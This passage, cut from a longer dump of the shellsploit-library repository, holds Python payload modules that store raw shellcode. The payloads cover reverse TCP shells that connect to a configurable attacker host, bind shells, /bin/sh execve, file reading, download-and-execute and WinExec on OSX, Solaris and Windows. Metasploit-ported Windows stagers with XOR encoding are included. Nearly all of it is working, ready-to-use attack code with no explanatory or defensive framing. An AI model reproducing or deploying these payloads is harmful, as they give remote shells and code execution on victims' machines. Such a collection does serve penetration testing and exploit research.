r"\x0c\x01\x01\x01\x50\x73\x0f\x24\xff\xff\x50\x30" 17 | r"\xef\xff\x0e\x24\x27\x70\xc0\x01" 18 | + kwargs["lport"] + 19 | r"\x0d\x24\x04\x68\xcd\x01\xff\xfd\x0e\x24\x27\x70\xc0\x01" 20 | r"\x25\x68\xae\x01\xe0\xff\xad\xaf\xe4\xff\xa0\xaf" 21 | r"\xe8\xff\xa0\xaf\xec\xff\xa0\xaf\x25\x20\x10\x02" 22 | r"\xef\xff\x0e\x24\x27\x30\xc0\x01\xe0\xff\xa5\x23" 23 | r"\x49\x10\x02\x24\x0c\x01\x01\x01\x50\x73\x0f\x24" 24 | r"\x25\x20\x10\x02\x01\x01\x05\x24\x4e\x10\x02\x24" 25 | r"\x0c\x01\x01\x01\x50\x73\x0f\x24\x25\x20\x10\x02" 26 | r"\xff\xff\x05\x28\xff\xff\x06\x28\x48\x10\x02\x24" 27 | r"\x0c\x01\x01\x01\x50\x73\x0f\x24\xff\xff\x50\x30" 28 | r"\x25\x20\x10\x02\xfd\xff\x0f\x24\x27\x28\xe0\x01" 29 | r"\xdf\x0f\x02\x24\x0c\x01\x01\x01\x50\x73\x0f\x24" 30 | r"\x25\x20\x10\x02\x01\x01\x05\x28\xdf\x0f\x02\x24" 31 | r"\x0c\x01\x01\x01\x50\x73\x0f\x24\x25\x20\x10\x02" 32 | r"\xff\xff\x05\x28\xdf\x0f\x02\x24\x0c\x01\x01\x01" 33 | r"\x50\x73\x0f\x24\x50\x73\x06\x24\xff\xff\xd0\x04" 34 | r"\x50\x73\x0f\x24\xff\xff\x06\x28\xdb\xff\x0f\x24" 35 | r"\x27\x78\xe0\x01\x21\x20\xef\x03\xf0\xff\xa4\xaf" 36 | r"\xf4\xff\xa0\xaf\xf0\xff\xa5\x23\xab\x0f\x02\x24" 37 | r"\x0c\x01\x01\x01\x2f\x62\x69\x6e\x2f\x73\x68" 38 | ] 39 | -------------------------------------------------------------------------------- /shellsploit/database/OSX64/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/riusksk/shellsploit-library/9c0e1fec2d510cc1195194ce18f5b6f0aeface9f/shellsploit/database/OSX64/__init__.py -------------------------------------------------------------------------------- /shellsploit/database/OSX64/bin_sh.py: -------------------------------------------------------------------------------- 1 | from lib.payloads.shellcode import Shellcode 2 | 3 | 4 | class Payload(Shellcode): 5 | Shellcode.info["author"] = "Csaba Fitzl" 6 | Shellcode.info["name"] = "OSX64 - execve shellcode" 7 | Shellcode.info["references"] = [ 8 | "https://packetstormsecurity.com/files/133452/OS-X-x64-bin-sh-Shellcode.html" 9 | ] 10 | Shellcode.info["size"] = 34 11 | Shellcode.info["payload"] = [ 12 | r"\x48\x31\xf6\x56\x48\xbf\x2f\x2f\x62" 13 | r"\x69\x6e\x2f\x73\x68\x57\x48\x89\xe7" 14 | r"\x48\x31\xd2\x48\x31\xc0\xb0\x02\x48" 15 | r"\xc1\xc8\x28\xb0\x3b\x0f\x05" 16 | ] 17 | -------------------------------------------------------------------------------- /shellsploit/database/OSX64/reverse_tcp.py: -------------------------------------------------------------------------------- 1 | from lib.payloads.shellcode import Shellcode 2 | 3 | 4 | class Payload(Shellcode): 5 | Shellcode.info["author"] = "Jacob Hammack" 6 | Shellcode.info["name"] = "OSX64 - reverse_tcp shellcode" 7 | Shellcode.info["references"] = [ 8 | "https://packetstormsecurity.com/files/100979/Mac-OS-X-Intel-Reverse-TCP-Shell-Shellcode.html", 9 | ] 10 | Shellcode.info["size"] = 131 11 | 12 | def __init__(self, **kwargs): 13 | Shellcode.info["payload"] = [ 14 | r"\x41\xB0\x02\x49\xC1\xE0\x18\x49\x83\xC8\x61\x4C\x89\xC0\x48" 15 | r"\x31\xD2\x48\x89\xD6\x48\xFF\xC6\x48\x89\xF7\x48\xFF\xC7\x0F" 16 | r"\x05\x49\x89\xC4\x49\xBD\x01\x01" 17 | + kwargs["lport"] + 18 | kwargs["host"] + 19 | r"\x41\xB1\xFF\x4D\x29\xCD\x41\x55\x49\x89\xE5\x49\xFF\xC0\x4C\x89" 20 | r"\xC0\x4C\x89\xE7\x4C\x89\xEE\x48\x83\xC2\x10\x0F\x05\x49\x83" 21 | r"\xE8\x08\x48\x31\xF6\x4C\x89\xC0\x4C\x89\xE7\x0F\x05\x48\x83" 22 | r"\xFE\x02\x48\xFF\xC6\x76\xEF\x49\x83\xE8\x1F\x4C\x89\xC0\x48" 23 | r"\x31\xD2\x49\xBD\xFF\x2F\x62\x69\x6E\x2F\x73\x68\x49\xC1\xED" 24 | r"\x08\x41\x55\x48\x89\xE7\x48\x31\xF6\x0F\x05" 25 | 26 | ] 27 | -------------------------------------------------------------------------------- /shellsploit/database/OSX64/tcp_bind.py: -------------------------------------------------------------------------------- 1 | from lib.payloads.shellcode import Shellcode 2 | 3 | 4 | class Payload(Shellcode): 5 | Shellcode.info["author"] = "Unkown" 6 | Shellcode.info["name"] = "OSX64 - tcp_bind shellcode" 7 | Shellcode.info["size"] = 144 8 | 9 | def __init__(self, **kwargs): 10 | Shellcode.info["payload"] = [ 11 | r"\x48\x31\xff\x40\xb7\x02\x48\x31\xf6\x40\xb6\x01\x48\x31\xd2\x48" 12 | r"\x31\xc0\xb0\x02\x48\xc1\xc8\x28\xb0\x61\x49\x89\xc4\x0f\x05\x49" 13 | r"\x89\xc1\x48\x89\xc7\x48\x31\xf6\x56\xbe\x01\x02" 14 | + kwargs["lport"] + 15 | r"\x83\xee" 16 | r"\x01\x56\x48\x89\xe6\xb2\x10\x41\x80\xc4\x07\x4c\x89\xe0\x0f\x05" 17 | r"\x48\x31\xf6\x48\xff\xc6\x41\x80\xc4\x02\x4c\x89\xe0\x0f\x05\x48" 18 | r"\x31\xf6\x41\x80\xec\x4c\x4c\x89\xe0\x0f\x05\x48\x89\xc7\x48\x31" 19 | r"\xf6\x41\x80\xc4\x3c\x4c\x89\xe0\x0f\x05\x48\xff\xc6\x4c\x89\xe0" 20 | r"\x0f\x05\x48\x31\xf6\x56\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68" 21 | r"\x57\x48\x89\xe7\x48\x31\xd2\x41\x80\xec\x1f\x4c\x89\xe0\x0f\x05" 22 | 23 | ] 24 | -------------------------------------------------------------------------------- /shellsploit/database/OSX86/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/riusksk/shellsploit-library/9c0e1fec2d510cc1195194ce18f5b6f0aeface9f/shellsploit/database/OSX86/__init__.py -------------------------------------------------------------------------------- /shellsploit/database/OSX86/bin_sh.py: -------------------------------------------------------------------------------- 1 | from lib.payloads.shellcode import Shellcode 2 | 3 | 4 | class Payload(Shellcode): 5 | Shellcode.info["author"] = "Simon Derouineau" 6 | Shellcode.info["name"] = "OSX86 - execve shellcode" 7 | Shellcode.info["references"] = [ 8 | "http://shell-storm.org/shellcode/files/shellcode-692.php" 9 | ] 10 | Shellcode.info["size"] = 24 11 | Shellcode.info["payload"] = [ 12 | r"\x31\xC0\x50" 13 | r"\x68\x2F\x2F\x73\x68" 14 | r"\x68\x2F\x62\x69\x6E" 15 | r"\x89\xE3\x50\x50\x53" 16 | r"\xB0\x3B\x6A\x2A" 17 | r"\xCD\x80" 18 | ] 19 | -------------------------------------------------------------------------------- /shellsploit/database/OSX86/reverse_tcp.py: -------------------------------------------------------------------------------- 1 | from lib.payloads.shellcode import Shellcode 2 | 3 | 4 | class Payload(Shellcode): 5 | Shellcode.info["author"] = "Unkown" 6 | Shellcode.info["name"] = "OSX86 - reverse_tcp shellcode" 7 | Shellcode.info["size"] = 68 8 | 9 | def __init__(self, **kwargs): 10 | Shellcode.info["payload"] = [ 11 | r"\x68" 12 | + kwargs["host"] + 13 | r"\x68\xff\x02" 14 | + kwargs["lport"] + 15 | r"\x89\xe7\x31\xc0" 16 | r"\x50\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50" 17 | r"\x6a\x62\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4f\xe8" 18 | r"\x79\xf6\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3" 19 | r"\x50\x54\x54\x53\x50\xb0\x3b\xcd\x80" 20 | 21 | ] 22 | -------------------------------------------------------------------------------- /shellsploit/database/OSX86/tcp_bind.py: -------------------------------------------------------------------------------- 1 | from lib.payloads.shellcode import Shellcode 2 | 3 | 4 | class Payload(Shellcode): 5 | Shellcode.info["author"] = "KedAns-Dz" 6 | Shellcode.info["name"] = "OSX86 - tcp_bind shellcode" 7 | Shellcode.info["references"] = [ 8 | "https://packetstormsecurity.com/files/109627/OS-X-x86-Port-Binding-Shellcode.html", 9 | ] 10 | Shellcode.info["size"] = 97 11 | 12 | def __init__(self, **kwargs): 13 | Shellcode.info["payload"] = [ 14 | r"\x31\xC0\x50\x50\x50\xB0\x7E\xCD\x80" 15 | r"\x31\xC0\x50\x50\xB0\x17\xCD\x80\x31\xC0" 16 | r"\x50\x68\xFF\x02" 17 | + kwargs["lport"] + 18 | r"\x89\xE7\x50\x6A\x01\x6A\x02\x6A\x10" 19 | r"\xB0\x61\xCD\x80\x57\x50\x50\x6A\x68" 20 | r"\x58\xCD\x80\x89\x47\xEC\xB0\x6A\xCD\x80" 21 | r"\xB0\x1E\xCD\x80\x50\x50\x6A\x5A\x58" 22 | r"\xCD\x80\xFF\x4F\xE4\x79\xF6\x50" 23 | r"\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E" 24 | r"\x89\xE3\x50\x54\x54\x53\x50\xB0\x3B" 25 | r"\xCD\x80" 26 | 27 | ] 28 | -------------------------------------------------------------------------------- /shellsploit/database/Solarisx86/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/riusksk/shellsploit-library/9c0e1fec2d510cc1195194ce18f5b6f0aeface9f/shellsploit/database/Solarisx86/__init__.py -------------------------------------------------------------------------------- /shellsploit/database/Solarisx86/bin_sh.py: -------------------------------------------------------------------------------- 1 | from lib.payloads.shellcode import Shellcode 2 | 3 | 4 | class Payload(Shellcode): 5 | Shellcode.info["author"] = "Jonathan Salwan" 6 | Shellcode.info["name"] = "Solarisx86 - execve shellcode" 7 | Shellcode.info["references"] = [ 8 | "http://shell-storm.org/shellcode/files/shellcode-613.php" 9 | ] 10 | Shellcode.info["size"] = 27 11 | Shellcode.info["payload"] = [ 12 | r"\x31\xc0\x50\x68\x6e\x2f" 13 | r"\x73\x68\x68\x2f\x2f\x62" 14 | r"\x69\x89\xe3\x50\x53\x89" 15 | r"\xe2\x50\x52\x53\xb0\x3b" 16 | r"\x50\xcd\x91" 17 | ] 18 | -------------------------------------------------------------------------------- /shellsploit/database/Solarisx86/read.py: -------------------------------------------------------------------------------- 1 | from lib.payloads.shellcode import Shellcode 2 | 3 | 4 | class Payload(Shellcode): 5 | Shellcode.info["author"] = "sm4x" 6 | Shellcode.info["name"] = "Solarisx86 - file_reader shellcode" 7 | Shellcode.info["references"] = [ 8 | "http://shell-storm.org/shellcode/files/shellcode-111.php" 9 | ] 10 | 11 | def __init__(self, **kwargs): 12 | Shellcode.info["size"] = 47 + Shellcode().getsize(kwargs["file"]) 13 | Shellcode.info["payload"] = [ 14 | r"\x31\xc0\x50\x50\xb0\x17\xcd\x91\xeb\x20" 15 | r"\x5e\x50\x68\x2f\x63\x61\x74\x68\x2f\x62" 16 | r"\x69\x6e\x89\xe3\x50\x56\x53\x89\xe2\x50" 17 | r"\x52\x53\xb0\x3b\x50\xcd\x91\x40\x50\x50" 18 | r"\xcd\x91\xe8\xdb\xff\xff\xff" 19 | + kwargs["file"] 20 | ] 21 | -------------------------------------------------------------------------------- /shellsploit/database/Solarisx86/reverse_tcp.py: -------------------------------------------------------------------------------- 1 | from lib.payloads.shellcode import Shellcode 2 | 3 | 4 | class Payload(Shellcode): 5 | Shellcode.info["author"] = "Unkown" 6 | Shellcode.info["name"] = "Solarisx86 - reverse_tcp shellcode" 7 | Shellcode.info["size"] = 89 8 | 9 | def __init__(self, **kwargs): 10 | Shellcode.info["payload"] = [ 11 | r"\x68\xff\xd8\xff\x3c\x6a\x65\x89\xe6\xf7\x56\x04\xf6\x16\x68" 12 | + kwargs["host"] + 13 | r"\x66\x68" 14 | + kwargs["lport"] + 15 | r"\x66\x6a\x02\x89\xe7" 16 | r"\x6a\x02\x31\xc0\x50\x50\x6a\x02\x6a\x02\xb0\xe6\xff\xd6" 17 | r"\x6a\x10\x57\x50\x31\xc0\xb0\xeb\xff\xd6\x5b\x53\x6a\x09" 18 | r"\x53\x6a\x3e\x58\xff\xd6\xff\x4f\xe0\x79\xf6\x50\x68\x2f" 19 | r"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1" 20 | r"\x50\x51\x53\xb0\x3b\xff\xd6" 21 | 22 | ] 23 | -------------------------------------------------------------------------------- /shellsploit/database/Solarisx86/tcp_bind.py: -------------------------------------------------------------------------------- 1 | from lib.payloads.shellcode import Shellcode 2 | 3 | 4 | class Payload(Shellcode): 5 | Shellcode.info["author"] = "Unkown" 6 | Shellcode.info["name"] = "Solarisx86 - tcp_bind shellcode" 7 | 8 | def __init__(self, **kwargs): 9 | Shellcode.info["size"] = 93 + Shellcode().getsize(kwargs["lport"]) 10 | Shellcode.info["payload"] = [ 11 | r"\x68\xff\xd8\xff\x3c\x6a\x65\x89\xe6\xf7\x56\x04\xf6\x16" 12 | r"\x31\xc0\x50\x68\xff\x02" 13 | + kwargs["lport"] + 14 | r"\x89\xe7\x6a\x02\x50\x50" 15 | r"\x6a\x02\x6a\x02\xb0\xe6\xff\xd6\x6a\x10\x57\x50\x31\xc0" 16 | r"\xb0\xe8\xff\xd6\x5b\x50\x50\x53\xb0\xe9\xff\xd6\xb0\xea" 17 | r"\xff\xd6\x6a\x09\x50\x6a\x3e\x58\xff\xd6\xff\x4f\xd8\x79" 18 | r"\xf6\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3" 19 | r"\x50\x53\x89\xe1\x50\x51\x53\xb0\x3b\xff\xd6" 20 | 21 | ] 22 | -------------------------------------------------------------------------------- /shellsploit/database/Windows/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/riusksk/shellsploit-library/9c0e1fec2d510cc1195194ce18f5b6f0aeface9f/shellsploit/database/Windows/__init__.py -------------------------------------------------------------------------------- /shellsploit/database/Windows/bind_tcp.py: -------------------------------------------------------------------------------- 1 | # Bind TCP Payload - Completely ported from Metasploit Framework 2 | # https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/stagers/windows/bind_tcp.rb 3 | 4 | from .xor import * 5 | 6 | 7 | class PayloadModule: 8 | def __init__(self, port): 9 | self.name = "Bind TCP Stager (Stage 1)" 10 | self.cli_name = "bind_tcp" 11 | self.platform = "Windows" 12 | self.arch = "x86" 13 | self.lport = int(port) 14 | self.port_offset = 197 15 | self.customized_shellcode = '' 16 | self.stager = ( 17 | "\xFC\xE8\x86\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + 18 | "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" + 19 | "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" + 20 | "\x8B\x52\x10\x8B\x42\x3C\x8B\x4C\x10\x78\xE3\x4A\x01\xD1\x51\x8B" + 21 | "\x59\x20\x01\xD3\x8B\x49\x18\xE3\x3C\x49\x8B\x34\x8B\x01\xD6\x31" + 22 | "\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4\x03\x7D\xF8" + 23 | "\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B" + 24 | "\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61" + 25 | "\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x89\x5D\x68\x33\x32" + 26 | "\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07\xFF\xD5\xB8" + 27 | "\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00\xFF\xD5\x50" + 28 | "\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF\xD5\x97\x31" + 29 | "\xDB\x53\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56\x57\x68\xC2\xDB" + 30 | "\x37\x67\xFF\xD5\x53\x57\x68\xB7\xE9\x38\xFF\xFF\xD5\x53\x53\x57" + 31 | "\x68\x74\xEC\x3B\xE1\xFF\xD5\x57\x97\x68\x75\x6E\x4D\x61\xFF\xD5" + 32 | "\x6A\x00\x6A\x04\x56\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A" + 33 | "\x40\x68\x00\x10\x00\x00\x56\x6A\x00\x68\x58\xA4\x53\xE5\xFF\xD5" + 34 | "\x93\x53\x6A\x00\x56\x53\x57\x68\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3" + 35 | "\x29\xC6\x85\xF6\x75\xEC\xC3") 36 | 37 | def gen_shellcode(self): 38 | port_shellcode_stage = str(hex(self.lport).lstrip('0')) 39 | if len(port_shellcode_stage.lstrip('x')) == 3: 40 | # detect if odd number, is so, need to add a '0' to the front 41 | port_1half = '0' + port_shellcode_stage[0:2].lstrip('x') 42 | port_1half = '\\x' + port_1half 43 | port_2half = port_shellcode_stage[2:4] 44 | port_2half = '\\x' + port_2half 45 | port_shellcode = port_1half + port_2half 46 | elif len(port_shellcode_stage.lstrip('x')) == 4: 47 | port_1half = port_shellcode_stage[1:3] 48 | port_1half = '\\x' + port_1half 49 | port_2half = port_shellcode_stage[3:5] 50 | port_2half = '\\x' + port_2half 51 | port_shellcode = port_1half + port_2half 52 | elif len(port_shellcode_stage.lstrip('x')) == 2: 53 | port_1half = port_shellcode_stage[1:3].lstrip('x') 54 | port_1half = '\\x' + port_1half 55 | port_2half = '00' 56 | port_2half = '\\x' + port_2half 57 | port_shellcode = port_2half + port_1half 58 | elif len(port_shellcode_stage.lstrip('x')) == 1: 59 | port_1half = port_shellcode_stage.lstrip('x') 60 | port_1half = '\\x0' + port_1half 61 | port_2half = '\\x00' 62 | port_shellcode = port_2half + port_1half 63 | 64 | stager_shellcode = self.stager[0:self.port_offset] 65 | stager_shellcode += port_shellcode.decode('string-escape') 66 | stager_shellcode += self.stager[self.port_offset + 2:] 67 | 68 | self.customized_shellcode = "\\x" + '\\x'.join(stager_shellcode.encode('hex')[i:i + 2] for i in range(0, len(stager_shellcode.encode('hex')), 2)) 69 | return EncoderModule(self.customized_shellcode).do_the_magic() 70 | -------------------------------------------------------------------------------- /shellsploit/database/Windows/downloadandexecute.py: -------------------------------------------------------------------------------- 1 | from lib.payloads.shellcode import Shellcode 2 | 3 | 4 | class Payload(Shellcode): 5 | Shellcode.info["author"] = "B3mB4m" 6 | Shellcode.info["name"] = "Windows - download&execute shellcode" 7 | Shellcode.info["references"] = [ 8 | "https://www.exploit-db.com/exploits/39389/" 9 | ] 10 | 11 | def __init__(self, **kwargs): 12 | Shellcode.info["size"] = \ 13 | 187 + Shellcode().getsize(kwargs["payload"]) 14 | Shellcode.info["payload"] = [ 15 | r"\x31\xc9\xb9\x57\x69\x6e\x45\xeb\x04\x31\xc9\xeb\x00\x31\xc0\x31" 16 | r"\xdb\x31\xd2\x31\xff\x31\xf6\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f" 17 | r"\x1c\x8b\x47\x08\x8b\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89" 18 | r"\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd" 19 | r"\x81\xf9\x57\x69\x6e\x45\x0f\x85\x30\x01\x00\x00\x8b\x34\xaf\x01" 20 | r"\xc6\x45\x39\x0e\x75\xf6\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b" 21 | r"\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd" 22 | + kwargs["payload"] + 23 | r"\x89\xe2\x41\x51\x52\xff\xd7\xe8\x8d\xfe\xff\xff\x8b\x34\xaf\x01\xc6" 24 | r"\x45\x81\x3e\x45\x78\x69\x74\x75\xf2\x81\x7e\x04\x50\x72\x6f\x63\x75" 25 | r"\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c" 26 | r"\xaf\xfc\x01\xc7\x31\xc9\x51\xff\xd7" 27 | 28 | ] 29 | -------------------------------------------------------------------------------- /shellsploit/database/Windows/execc.py: -------------------------------------------------------------------------------- 1 | # Work already test on w7,w8,w10(x86/x86_x64) 2 | import codecs 3 | 4 | 5 | def WinExec(command): 6 | from re import findall 7 | fill = "31c9b957696e45eb0431c9eb0031c" 8 | fill += "031db31d231ff31f6648b7b308b7f0" 9 | fill += "c8b7f1c8b47088b77208b3f807e0c3" 10 | fill += "375f289c703783c8b577801c28b7a2" 11 | fill += "001c789dd81f957696e45753b8b34a" 12 | fill += "f01c645390e75f68b7a2401c7668b2" 13 | fill += "c6f8b7a1c01c78b7caffc01c789d9b1ff53e2fd" 14 | if len(command) == 4: 15 | stack = "%s" % (codecs.encode(command, 'hex')) 16 | data = findall("..?", stack) 17 | fill += "68" + "".join(data) 18 | else: 19 | if len(command) % 4 == 3: 20 | padd = "\x20" 21 | elif len(command) % 4 == 2: 22 | padd = "\x20" * 2 23 | elif len(command) % 4 == 1: 24 | padd = "\x20" * 3 25 | else: 26 | padd = "" 27 | command = command + padd 28 | fixmesempai = findall('....?', command) 29 | for x in fixmesempai[::-1]: 30 | first = str(codecs.encode(x[::-1].encode('utf-8'), 'hex')) 31 | second = findall("..?", first)[::-1] 32 | fill += "68" + "".join(second) 33 | fill += "89e2415152ffd7e886ffffff8b34af0" 34 | fill += "1c645813e4578697475f2817e045072" 35 | fill += "6f6375e98b7a2401c7668b2c6f8b7a1c" 36 | fill += "01c78b7caffc01c731c951ffd7" 37 | return "\\x" + "\\x".join(findall("..?", fill)) 38 | -------------------------------------------------------------------------------- /shellsploit/database/Windows/messagebox.py: -------------------------------------------------------------------------------- 1 | from lib.payloads.shellcode import Shellcode 2 | 3 | 4 | class Payload(Shellcode): 5 | Shellcode.info["author"] = "noviceflux" 6 | Shellcode.info["name"] = "Windows - messagebox shellcode" 7 | Shellcode.info["references"] = [ 8 | "https://www.exploit-db.com/exploits/37758/" 9 | ] 10 | 11 | def __init__(self, **kwargs): 12 | Shellcode.info["payload"] = [ 13 | r"\x33\xc9\x64\x8b\x49\x30\x8b\x49\x0c\x8b" 14 | r"\x49\x1c\x8b\x59\x08\x8b\x41\x20\x8b\x09" 15 | r"\x80\x78\x0c\x33\x75\xf2\x8b\xeb\x03\x6d" 16 | r"\x3c\x8b\x6d\x78\x03\xeb\x8b\x45\x20\x03" 17 | r"\xc3\x33\xd2\x8b\x34\x90\x03\xf3\x42\x81" 18 | r"\x3e\x47\x65\x74\x50\x75\xf2\x81\x7e\x04" 19 | r"\x72\x6f\x63\x41\x75\xe9\x8b\x75\x24\x03" 20 | r"\xf3\x66\x8b\x14\x56\x8b\x75\x1c\x03\xf3" 21 | r"\x8b\x74\x96\xfc\x03\xf3\x33\xff\x57\x68" 22 | r"\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68" 23 | r"\x4c\x6f\x61\x64\x54\x53\xff\xd6\x33\xc9" 24 | r"\x57\x66\xb9\x33\x32\x51\x68\x75\x73\x65" 25 | r"\x72\x54\xff\xd0\x57\x68\x6f\x78\x41\x01" 26 | r"\xfe\x4c\x24\x03\x68\x61\x67\x65\x42\x68" 27 | r"\x4d\x65\x73\x73\x54\x50\xff\xd6\x57" 28 | ] 29 | 30 | if "message" not in kwargs: 31 | Shellcode.info["payload"][0] += r"\x68\x72\x6c\x64\x21\x68" 32 | Shellcode.info["payload"][0] += r"\x6f\x20\x57\x6f\x68\x48" 33 | Shellcode.info["payload"][0] += r"\x65\x6c\x6c" 34 | else: 35 | Shellcode.info["payload"][0] += kwargs["message"] 36 | 37 | Shellcode.info["payload"][0] += r"\x8b\xcc\x57\x57\x51\x57" 38 | Shellcode.info["payload"][ 39 | 0] += r"\xff\xd0\x57\x68\x65\x73\x73\x01\xfe\x4c" 40 | Shellcode.info["payload"][ 41 | 0] += r"\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78" 42 | Shellcode.info["payload"][0] += r"\x69\x74\x54\x53\xff\xd6\x57\xff\xd0" 43 | -------------------------------------------------------------------------------- /shellsploit/database/Windows/rev_tcp.py: -------------------------------------------------------------------------------- 1 | # This is the reverse_tcp payload, completely ported from the Metasploit 2 | # Framework. 3 | # https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/stagers/windows/reverse_tcp.rb 4 | 5 | import binascii 6 | import socket 7 | from .xor import * 8 | 9 | 10 | class PayloadModule: 11 | 12 | def __init__(self, lhost, lport): 13 | self.lport = int(lport) 14 | self.lhost = lhost 15 | self.retries_offset = 192 16 | self.lhost_offset = 194 17 | self.lport_offset = 201 18 | self.exitfunc_offset = 226 19 | self.customized_shellcode = '' 20 | self.stager = ( 21 | "\xFC\xE8\x86\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" + 22 | "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" + 23 | "\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" + 24 | "\x8B\x52\x10\x8B\x42\x3C\x8B\x4C\x10\x78\xE3\x4A\x01\xD1\x51\x8B" + 25 | "\x59\x20\x01\xD3\x8B\x49\x18\xE3\x3C\x49\x8B\x34\x8B\x01\xD6\x31" + 26 | "\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4\x03\x7D\xF8" + 27 | "\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B" + 28 | "\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61" + 29 | "\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x89\x5D\x68\x33\x32" + 30 | "\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07\xFF\xD5\xB8" + 31 | "\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00\xFF\xD5\x50" + 32 | "\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF\xD5\x97\x6A" + 33 | "\x05\x68\x7F\x00\x00\x01\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56" + 34 | "\x57\x68\x99\xA5\x74\x61\xFF\xD5\x85\xC0\x74\x0C\xFF\x4E\x08\x75" + 35 | "\xEC\x68\xF0\xB5\xA2\x56\xFF\xD5\x6A\x00\x6A\x04\x56\x57\x68\x02" + 36 | "\xD9\xC8\x5F\xFF\xD5\x8B\x36\x6A\x40\x68\x00\x10\x00\x00\x56\x6A" + 37 | "\x00\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x6A\x00\x56\x53\x57\x68" + 38 | "\x02\xD9\xC8\x5F\xFF\xD5\x01\xC3\x29\xC6\x85\xF6\x75\xEC\xC3") 39 | 40 | def gen_shellcode(self): 41 | # Take the passed in attributes and gen shellcode 42 | ip_shellcode = '' 43 | n = 2 44 | ip_shellcode_stage = binascii.hexlify(socket.inet_aton(self.lhost)) 45 | ip_shellcode_stage = [ip_shellcode_stage[i:i + n] for i in range(0, len(ip_shellcode_stage), n)] 46 | for two_bytes in ip_shellcode_stage: 47 | ip_shellcode += '\\x' + two_bytes 48 | 49 | # convert port to shellcode 50 | port_shellcode_stage = str(hex(self.lport).lstrip('0')) 51 | if len(port_shellcode_stage.lstrip('x')) == 3: 52 | # detect if odd number, is so, need to add a '0' to the front 53 | port_1half = '0' + port_shellcode_stage[0:2].lstrip('x') 54 | port_1half = '\\x' + port_1half 55 | port_2half = port_shellcode_stage[2:4] 56 | port_2half = '\\x' + port_2half 57 | port_shellcode = port_1half + port_2half 58 | elif len(port_shellcode_stage.lstrip('x')) == 4: 59 | port_1half = port_shellcode_stage[1:3] 60 | port_1half = '\\x' + port_1half 61 | port_2half = port_shellcode_stage[3:5] 62 | port_2half = '\\x' + port_2half 63 | port_shellcode = port_1half + port_2half 64 | elif len(port_shellcode_stage.lstrip('x')) == 2: 65 | port_1half = port_shellcode_stage[1:3].lstrip('x') 66 | port_1half = '\\x' + port_1half 67 | port_2half = '00' 68 | port_2half = '\\x' + port_2half 69 | port_shellcode = port_2half + port_1half 70 | elif len(port_shellcode_stage.lstrip('x')) == 1: 71 | port_1half = port_shellcode_stage.lstrip('x') 72 | port_1half = '\\x0' + port_1half 73 | port_2half = '\\x00' 74 | port_shellcode = port_2half + port_1half 75 | 76 | retries = '\x09' 77 | 78 | stager_shellcode = self.stager[0:self.retries_offset] 79 | stager_shellcode += retries 80 | stager_shellcode += self.stager[self.retries_offset + 1:self.lhost_offset] 81 | stager_shellcode += ip_shellcode.decode('string-escape') 82 | stager_shellcode += self.stager[self.lhost_offset + 4:self.lport_offset] 83 | stager_shellcode += port_shellcode.decode('string-escape') 84 | stager_shellcode += self.stager[self.lport_offset + 2:] 85 | 86 | self.customized_shellcode = "\\x" + 